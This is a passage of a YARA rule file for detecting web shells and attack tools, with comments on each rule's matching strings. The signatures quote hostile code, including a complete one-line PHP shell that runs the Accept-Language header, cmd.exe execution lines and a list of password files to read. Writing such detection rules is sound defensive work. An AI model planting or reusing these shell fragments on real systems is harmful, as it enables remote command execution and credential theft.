        hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
        hash7 = "e9a5280f77537e23da2545306f6a19ad"
    strings:
        $x1 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol" ascii
        $x2 = " KB </td>" fullword ascii
        $x3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"" ascii
        $x4 = "<!-- <tr align=\"center\"> " fullword ascii
    condition:
        all of ($x*)
}
rule webshell_ELMALISEKER_Backd00r {
    // Both required: a file-option submit row and the folder-command
    // dispatch condition of the ELMALISEKER shell.
    meta:
        description = "Web Shell - file ELMALISEKER Backd00r.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
    strings:
        $x1 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio" ascii
        $x2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req" ascii
    condition:
        $x1 and $x2
}
rule multiple_webshells_0010 {
    // Super rule for three c99-family shells; either the SQL action link
    // or the c99sh_sqlquery identifier alone matches.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_w_php_php_wacking_php_php_SpecialShell_99_php_php"
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "9c5bb5e3a46ec28039e8986324e42792"
        hash2 = "09609851caa129e40b0d56e90dfc476c"
    strings:
        $x1 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur" ascii
        $x2 = "c99sh_sqlquery" ascii
    condition:
        $x1 or $x2
}
rule webshell_wso2_5_1_wso2_5_wso2 {
    // Super rule for three WSO versions; both the charset option builder
    // and the FilesTools link builder are required.
    meta:
        description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "dbeecd555a2ef80615f0894027ad75dc"
        hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
        hash2 = "cbc44fb78220958f81b739b493024688"
    strings:
        $x1 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec" ascii
        $x2 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na" ascii
    condition:
        $x1 and $x2
}
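// "W3D Shell" (PHP). All three strings are banner/author/status text rather than
// code; two of three are required, so a bare "W3D Shell" mention in an unrelated
// file does not fire on its own. Closing brace restored.
rule w3d_php_php {
    meta:
        description = "Semi-Auto-generated  - file w3d.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "987f66b29bfb209a0b4f097f84f57c3b"
    strings:
        $s0 = "W3D Shell"
        $s1 = "By: Warpboy"
        $s2 = "No Query Executed"
    condition:
        2 of them
}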
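// Windows port-redirector binary (rdrbs100.exe) from a web-shell toolkit. Both
// strings are the program's console messages (IP-format check, mapped-port list);
// both are required. Closing brace restored.
rule rdrbs100 {
    meta:
        description = "Webshells Auto-generated - file rdrbs100.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "7c752bcd6da796d80a6830c61a632bff"
    strings:
        $s3 = "Server address must be IP in A.B.C.D format."
        $s4 = " mapped ports in the list. Currently "
    condition:
        all of them
}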
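// Super rule for the r57 shell family and antichat.php. All four fragments come from
// the shared MySQL dump feature (SHOW CREATE TABLE, row concatenation, fputs of the
// dump, addslashes over values); any two are required. Closing brace restored.
rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat {
    meta:
        description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "ae025c886fbe7f9ed159f49593674832"
        hash1 = "513b7be8bd0595c377283a7c87b44b2e"
        hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
        hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
        hash4 = "3f71175985848ee46cc13282fbed2269"
    strings:
        $s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
        $s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
        $s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
        $s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
    condition:
        2 of them
}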
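// "mysql_tool" PHP shell. $s0/$s4 are its own UI messages; $s1 is a well-known
// injected stub (rand()-derived "sh-" session name) that is shared across several
// PHP shells in this collection, so with "1 of them" the rule also hits other
// files carrying that stub. Closing brace restored.
rule mysql_tool_php_php {
    meta:
        description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "5fbe4d8edeb2769eda5f4add9bab901e"
    strings:
        $s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
        $s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
        $s4 = "<div align=\"center\">The backup process has now started<br "
    condition:
        1 of them
}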
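// SetupBDoor.exe installer. Single-string rule on a build/output path fragment
// ("\BDoor\SetupBDoor"); it identifies this build's path artefact, not behaviour,
// so pair a hit with file-type and context checks. Closing brace restored.
rule SetupBDoor {
    meta:
        description = "Webshells Auto-generated - file SetupBDoor.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "41f89e20398368e742eda4a3b45716b6"
    strings:
        $s1 = "\\BDoor\\SetupBDoor"
    condition:
        all of them
}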
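// Super rule for the PHPJackal / itsecteam shell lineage. The fragments are the
// shared database client code (pg_connect, OCI fetch loop, pg_fetch_row loop with
// the "|-|-|-|-|-|" row separator); any two are required. PHPJackal v1.5 is also
// covered separately by webshell_PHPJackal_v1_5. Closing brace restored.
rule webshell_itsec_PHPJackal_itsecteam_shell_jHn {
    meta:
        description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "8ae9d2b50dc382f0571cd7492f079836"
        hash1 = "e2830d3286001d1455479849aacbbb38"
        hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
        hash3 = "40c6ecf77253e805ace85f119fe1cebb"
    strings:
        $s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
        $s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
        $s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
    condition:
        2 of them
}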
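// Generic rule for the Dive Shell / SimShell family (hashes are SHA1). The strings
// are the shared command-history JavaScript and the PHP alias/session handling of
// the "command" request parameter; five of seven are required, so the rule needs
// most of the shared code base, not just one idiom. Closing brace restored.
rule WebShell_Generic_PHP_1 {
    meta:
        description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
        hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
        hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
        hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
    strings:
        $s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword
        $s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword
        $s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword
        $s9 = "document.shell.command.value = command_hist[current_line];" fullword
        $s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $"
        $s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword
        $s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword
    condition:
        5 of them
}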
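// NTDaddy ASP shell. Both literals carry doubled spaces, which are matched exactly,
// so a single-spaced copy is not caught here (that variant is the $s2 of
// webshell_ELMALISEKER_Backd00r). Either string fires. Closing brace restored.
rule webshell_asp_ntdaddy {
    meta:
        description = "Web Shell - file ntdaddy.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "c5e6baa5d140f73b4e16a6cfde671c68"
    strings:
        $s9 = "if  FP  =  \"RefreshFolder\"  or  "
        $s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
    condition:
        1 of them
}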
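// JSP directory lister / file browser (list.jsp). $s0 is a generic empty-action POST
// form and would be common on its own; specificity comes from the file-link builder
// ($s2) and the canRead() permission printer ($s7), and all three are required.
// Closing brace restored.
rule webshell_jsp_list {
    meta:
        description = "Web Shell - file list.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "1ea290ff4259dcaeb680cec992738eda"
    strings:
        $s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
        $s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
        $s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
    condition:
        all of them
}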
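// "DTool Pro" PHP shell (Portuguese-language UI). Strings are the author tag, the
// chdir error message and the exclusive-commands banner; any one fires.
// Closing brace restored.
rule DTool_Pro_php {
    meta:
        description = "Semi-Auto-generated  - file DTool Pro.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "366ad973a3f327dfbfb915b0faaea5a6"
    strings:
        $s0 = "r3v3ng4ns\\nDigite"
        $s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
        $s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
    condition:
        1 of them
}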
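// JSP upload shell (123.jsp). The run of "?" in $s0 is matched literally (presumably
// non-ASCII label text that was lost when the signature was generated), so $s0 only
// hits files where the same replacement happened; $s3 (ISO-8859-1 re-decoding of the
// "path" parameter) and $s9 are the reliable parts, and all three are required.
// Closing brace restored.
rule webshell_jsp_123 {
    meta:
        description = "Web Shell - file 123.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "c691f53e849676cac68a38d692467641"
    strings:
        $s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
        $s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
        $s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
    condition:
        all of them
}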
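// PHP spam auto-spreader (tagged webshell). Keys on a fixed User-Agent string, a
// hard-coded connection-error banner and a regex for the Submit handler; all three
// are required. The trailing "{" in $c is a literal brace, not a quantifier.
// Closing brace restored.
rule chinese_spam_spreader : webshell {
    meta:
        author      = "Vlad https://github.com/vlad-s"
        date        = "2016/07/18"
        description = "Catches chinese PHP spam files (autospreaders)"
    strings:
        $a = "User-Agent: aQ0O010O"
        $b = "<font color='red'><b>Connection Error!</b></font>"
        $c = /if ?\(\$_POST\[Submit\]\) ?{/
    condition:
        all of them
}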
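// Classic ASP command shell (cmd.asp). $s0 prints machine\user via WScript.Network,
// $s1 creates a FileSystemObject, $s3 runs cmd.exe redirected to a temp file. Any
// one fires; $s3 is the same fragment required by ASP_CmdAsp below, so the two rules
// overlap on that family. Closing brace restored.
rule webshell_asp_cmd : webshell {
    meta:
        description = "Web Shell - file cmd.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "895ca846858c315a3ff8daa7c55b3119"
    strings:
        $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
        $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
        $s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
    condition:
        1 of them
}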
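// Foundstone Fport (port-to-process mapper) as bundled in a "g0t root" toolkit.
// Matches the copyright line and the admin-privilege message, both required.
// Fport is a legitimate, dual-use admin utility: a hit shows the tool is present,
// not that it was misused — triage with who dropped it and when. Closing brace restored.
rule shelltools_g0t_root_Fport {
    meta:
        description = "Webshells Auto-generated - file Fport.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "dbb75488aa2fa22ba6950aead1ef30d5"
    strings:
        $s4 = "Copyright 2000 by Foundstone, Inc."
        $s5 = "You must have administrator privileges to run fport - exiting..."
    condition:
        all of them
}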
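// "cyberlords" SQL shell (PHP). $s0/$s3 are author tag and dump error text; $s1 is
// just the site name; $s2 appears to be base64 of an embedded PNG's metadata
// ("Software"/"Adobe ImageReady" + PLTE), which any page embedding such an image
// could contain. Because "1 of them" suffices, expect occasional hits on $s1/$s2
// alone and confirm against $s0/$s3. Closing brace restored.
rule cyberlords_sql_php_php {
    meta:
        description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "03b06b4183cb9947ccda2c3d636406d4"
    strings:
        $s0 = "Coded by n0 [nZer0]"
        $s1 = " www.cyberlords.net"
        $s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
        $s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
    condition:
        1 of them
}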
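// Super rule for CrystalShell v.1 / erne.php / stres.php (hashes are SHA1). Strings
// are POST-parameter handlers (Mohajer22, curl, copy, cmd), a curl exec dump and an
// imap_open("/etc/passwd") trick; five of eight are required. Closing brace restored.
rule WebShell__CrystalShell_v_1_erne_stres {
    meta:
        description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
        hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
        hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
    strings:
        $s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
        $s4 = "var_dump(curl_exec($ch));" fullword
        $s7 = "if(empty($_POST['Mohajer22'])){" fullword
        $s10 = "$m=$_POST['curl'];" fullword
        $s13 = "$u1p=$_POST['copy'];" fullword
        $s14 = "if(empty(\\$_POST['cmd'])){" fullword
        $s15 = "$string = explode(\"|\",$string);" fullword
        $s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
    condition:
        5 of them
}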
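// "klasvayv" ASP folder browser. $s1/$s2 are its own querystring handling and form
// action; $s3 is the vendor footer and $s4 a CSS fragment that is generic enough to
// appear elsewhere — with "1 of them" prefer confirming on $s1/$s2.
// Closing brace restored.
rule klasvayv_asp {
    meta:
        description = "Semi-Auto-generated  - file klasvayv.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "2b3e64bf8462fc3d008a3d1012da64ef"
    strings:
        $s1 = "set aktifklas=request.querystring(\"aktifklas\")"
        $s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
        $s3 = "<font color=\"#858585\">www.aventgrup.net"
        $s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
    condition:
        1 of them
}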
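// "SimAttacker 1.0.0" PHP shell (hash is SHA1). Strings are group banners/links,
// the fake-mail feature's comments and form labels, and an error_reporting line that
// is generic on its own; three of seven are required. Closing brace restored.
rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend {
    meta:
        description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
        author = "Florian Roth"
        hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
    strings:
        $s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
        $s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
        $s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
        $s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
        $s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
        $s19 = "$Comments=$_POST['Comments'];" fullword
        $s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
    condition:
        3 of them
}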
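// Super rule for the nst/nstview family (nst.php, img.php, nstview.php). $s0/$s2 are
// the "Back connect" and "Backdoor" form rows; $s1 is the start of a base64 blob
// that decodes to a Perl shebang, i.e. an embedded proxy script. Any one fires.
// Closing brace restored.
rule multiple_webshells_0002 {
    meta:
        description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_nst_php_php_img_php_php_nstview_php_php"
        hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
        hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
        hash2 = "4745d510fed4378e4b1730f56f25e569"
    strings:
        $s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
        $s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
        $s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
    condition:
        1 of them
}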
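// Perl IRC bot "ShellBOT". $s0-$s2 are name/group tags, $s3 a Portuguese config
// comment, $s4 the ctcpflood command regex; two of five are required, so a lone
// "ShellBOT" mention does not fire. Closing brace restored.
rule shellbot_pl {
    meta:
        description = "Semi-Auto-generated  - file shellbot.pl.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
    strings:
        $s0 = "ShellBOT"
        $s1 = "PacktsGr0up"
        $s2 = "CoRpOrAtIoN"
        $s3 = "# Servidor de irc que vai ser usado "
        $s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
    condition:
        2 of them
}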
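// EditServer.exe (backdoor server configurator). The strings are short, partly
// truncated fragments ("Press Any Ke", "glish MenuZ") typical of a packed binary;
// all three are required, which is what keeps this rule usable. Closing brace restored.
rule EditServer_Webshell_2 {
    meta:
        description = "Webshells Auto-generated - file EditServer.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
    strings:
        $s0 = "@HOTMAIL.COM"
        $s1 = "Press Any Ke"
        $s3 = "glish MenuZ"
    condition:
        all of them
}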
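// "Antichat Shell v1.3" (PHP). $s0 is only the group name and $s2 the "$ra44"
// variable of the common injected stub (see mysql_tool_php_php); the error text in
// $s1 is the most specific part. Two of three are required. Closing brace restored.
rule Antichat_Shell_v1_3_php {
    meta:
        description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "40d0abceba125868be7f3f990f031521"
    strings:
        $s0 = "Antichat"
        $s1 = "Can't open file, permission denide"
        $s2 = "$ra44"
    condition:
        2 of them
}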
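// "elmaliseker" ASP shell (second variant; see also webshell_ELMALISEKER_Backd00r).
// $s0 is its random e-mail generator, $s1 the command form, $s2 the zombie/special
// arrays, $s3 the author URL; any one fires. Closing brace restored.
rule elmaliseker_asp {
    meta:
        description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "b32d1730d23a660fd6aa8e60c3dc549f"
    strings:
        $s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
        $s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
        $s2 = "dim zombie_array,special_array"
        $s3 = "http://vnhacker.org"
    condition:
        1 of them
}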
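// "h4ntu shell [powered by tsoi]" (PHP; hash is SHA1). $s11 is the page title; the
// rest are the command/whoami/uname handling. $s13 and $s20 are generic PHP idioms,
// so the "3 of them" threshold matters. $s17 is shared with Nshell__1__php_php.
// Closing brace restored.
rule WebShell_h4ntu_shell__powered_by_tsoi_ {
    meta:
        description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
        author = "Florian Roth"
        hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
    strings:
        $s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
        $s13 = "$cmd = $_POST['cmd'];" fullword
        $s16 = "$uname = posix_uname( );" fullword
        $s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
        $s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
        $s20 = "ob_end_clean();" fullword
    condition:
        3 of them
}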
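// remview.php (second rule for the same sample as FSO_s_remview; identical hash).
// Keys on the "<xmp>$out</" output wrapper and the "Eval PHP code" menu entry, both
// required. Closing brace restored.
rule FSO_s_remview_2 {
    meta:
        description = "Webshells Auto-generated - file remview.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "b4a09911a5b23e00b55abe546ded691c"
    strings:
        $s0 = "<xmp>$out</"
        $s1 = ".mm(\"Eval PHP code\")."
    condition:
        all of them
}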
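// Vanquish rootkit loader (vanquish.exe). Single-string rule on its DLL-injection
// failure message; see rule vanquish for the DLL side. Closing brace restored.
rule vanquish_2 {
    meta:
        description = "Webshells Auto-generated - file vanquish.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "2dcb9055785a2ee01567f52b5a62b071"
    strings:
        $s2 = "Vanquish - DLL injection failed:"
    condition:
        all of them
}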
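// "ironshell" PHP shell. $s1/$s4 are its cookie-based auth (cookie name "wieeeee",
// one-hour setcookie of the POSTed pass); $s0/$s3 are site references and $s2 a
// banner fragment. Any one fires, so the two URLs alone can trigger it.
// Closing brace restored.
rule ironshell_php {
    meta:
        description = "Semi-Auto-generated  - file ironshell.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "8bfa2eeb8a3ff6afc619258e39fded56"
    strings:
        $s0 = "www.ironwarez.info"
        $s1 = "$cookiename = \"wieeeee\";"
        $s2 = "~ Shell I"
        $s3 = "www.rootshell-team.info"
        $s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
    condition:
        1 of them
}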
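// zacosmall.php. Single-string rule on the command echo line (prints the submitted
// $cmd in <strong> above an <hr>). Closing brace restored.
rule webshell_zacosmall {
    meta:
        description = "Web Shell - file zacosmall.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "5295ee8dc2f5fd416be442548d68f7a6"
    strings:
        $s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
    condition:
        all of them
}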
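// One-line PHP shell that passthru()s the Accept-Language request header (hash is
// SHA1). The rule matches that exact line as a fullword string, so minor edits to
// the line evade it; it is precise but narrow. Closing brace restored.
rule WebShell_accept_language {
    meta:
        description = "PHP Webshells Github Archive - file accept_language.php"
        author = "Florian Roth"
        hash = "180b13576f8a5407ab3325671b63750adbcb62c9"
    strings:
        $s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword
    condition:
        all of them
}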
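// Laudanum ColdFusion shell (shell.cfm; hash is SHA1). Keys on the cmd input,
// the secretCode check and the form.cmd IsDefined test; two of three are required
// and the file must be under 20KB — the only size-bounded rule in this stretch,
// which helps keep it off large bundled sources. Closing brace restored.
rule cfm_shell : webshell {
    meta:
        description = "Laudanum Injector Tools - file shell.cfm"
        author = "Florian Roth"
        reference = "http://laudanum.inguardians.com/"
        date = "2015-06-22"
        hash = "885e1783b07c73e7d47d3283be303c9719419b92"
    strings:
        $s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii
    condition:
        filesize < 20KB and 2 of them
}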
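// Vanquish rootkit DLL. $s3 is its file-protection message; $s8/$s9 are MSVC-decorated
// names of its VCreateProcessA / VFindFirstFileExW hook functions. All three are
// required. Closing brace restored.
rule vanquish {
    meta:
        description = "Webshells Auto-generated - file vanquish.dll"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "684450adde37a93e8bb362994efc898c"
    strings:
        $s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
        $s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
        $s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
    condition:
        all of them
}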
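// ASP shell aaa.asp. $s0 is an obfuscating string function, $s5 an MSSQL option that
// splits "master..xp_regwrite" across a concatenation (likely to dodge keyword
// filters), $s17 a default MySQL my.ini path. Any one fires. Closing brace restored.
rule webshell_webshells_new_aaa {
    meta:
        description = "Web shells - generated from file aaa.asp"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "68483788ab171a155db5266310c852b2"
    strings:
        $s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
        $s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
        $s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
    condition:
        1 of them
}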
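// HYTop 2006 (2006X2.exe). $s2 "Powered By " is generic; specificity comes from the
// onClick handler in $s3 that renames the form field from the password value.
// Both are required. Closing brace restored.
rule HYTop2006_rar_Folder_2006X2 {
    meta:
        description = "Webshells Auto-generated - file 2006X2.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "cc5bf9fc56d404ebbc492855393d7620"
    strings:
        $s2 = "Powered By "
        $s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
    condition:
        all of them
}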
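// regshell.exe, an interactive registry editor from a web-shell toolkit. Matches
// three of its menu/help strings (hive switch, key listing, menu prompt); all are
// required. Closing brace restored.
rule regshell {
    meta:
        description = "Webshells Auto-generated - file regshell.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "db2fdc821ca6091bab3ebd0d8bc46ded"
    strings:
        $s0 = "Changes the base hive to HKEY_CURRENT_USER."
        $s4 = "Displays a list of values and sub-keys in a registry Hive."
        $s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: "
    condition:
        all of them
}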
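// Super rule for Crystal.php / nshell.php / load_shell.php. All three strings are
// ordinary directory-listing PHP (dot-entry filter, path concatenation, glob merge)
// and could occur in benign code; the "2 of them" threshold is the only guard, so
// treat hits as medium confidence and review the file. Closing brace restored.
rule multiple_webshells_0026 {
    meta:
        description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_Crystal_php_nshell_php_php_load_shell_php_php"
        hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
        hash1 = "4a44d82da21438e32d4f514ab35c26b6"
        hash2 = "0c5d227f4aa76785e4760cdcff78a661"
    strings:
        $s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
        $s1 = "$dires = $dires . $directory;" fullword
        $s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
    condition:
        2 of them
}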
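// dabao.asp (ASP packer/downloader shell). Both strings are its Echo'd JavaScript
// (document.location button, date-stamped pack file name); both are required.
// Closing brace restored.
rule webshell_asp_dabao {
    meta:
        description = "Web Shell - file dabao.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "3919b959e3fa7e86d52c2b0a91588d5d"
    strings:
        $s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
        $s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
    condition:
        all of them
}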
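// sh.php. $s1 is a hard-coded list of sensitive system files the shell offers to
// read (/etc/passwd, /etc/shadow, ...); $s2 is the paging control of its browser.
// Either one fires. Closing brace restored.
rule sh_php_php {
    meta:
        description = "Semi-Auto-generated  - file sh.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "330af9337ae51d0bac175ba7076d6299"
    strings:
        $s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
        $s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
    condition:
        1 of them
}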
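// 2005Gray.asp. $s0/$s9 are scrollbar CSS colours that are not distinctive by
// themselves; $s4/$s8 are the link builder and mapPath-relative path logic of the
// file browser. All four are required. Closing brace restored.
rule sig_2005Gray {
    meta:
        description = "Webshells Auto-generated - file 2005Gray.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "75dbe3d3b70a5678225d3e2d78b604cc"
    strings:
        $s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
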